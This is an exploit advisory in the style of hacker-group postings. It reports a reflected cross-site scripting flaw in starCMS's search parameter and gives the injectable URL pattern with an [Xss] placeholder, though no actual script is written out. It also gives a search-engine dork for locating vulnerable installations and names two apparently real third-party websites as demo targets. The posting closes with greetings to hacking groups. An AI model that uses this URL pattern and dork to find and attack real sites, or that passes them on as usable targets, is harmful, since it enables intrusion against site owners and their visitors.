#######################################################################################
#                                                                                     #
# Exploit Title : starCMS Cross-Site Scripting Vulnerabilitiy                         #
#                                                                                     #
# Author        : Zarbat.Org & IrIsT.Ir                                               #
#                                                                                     #
# Discovered By : Am!r                                                                #
#                                                                                     #
# Home          : http://Zarbat.Org/forums/                                           #
#                                                                                     #
# Software Link : http://www.starcms.net/                                             #
#                                                                                     #
# Security Risk : High                                                                #
#                                                                                     #
# Version       : All Version                                                         #
#                                                                                     #
# Tested on     : GNU/Linux Ubuntu - Windows Server - win7                            #
#                                                                                     #
# Dork          : "powered by starCMS"                                                #
#                                                                                     #
#######################################################################################
#                                                                                     #
#  Expl0iTs :                                                                         #
#                                                                                     #
#  [TarGeT]/index.php?q=[Xss]&r=5&lang=de&actionsuche=yes                             #
#                                                                                     #
#######################################################################################
#                                                                                     #
#  Demo:                                                                              #
#                                                                                     #
#  changestrategy.eu/index.php?q=[Xss]&r=5&lang=de&actionsuche=yes                    #
#                                                                                     #
#  forumfinanzplaner.at/index.php?q=[Xss]&r=5&actionsuche=yes                         #
#                                                                                     #
#######################################################################################
#                                                                                     #
# Greats : Aria-Security.Com - datacoders.org - black-hg.org - Ashiyane.Org           #
#                                                                                     #
#          Security7.ir &  And All Iranian Hackers                                    #
#                                                                                     #
#######################################################################################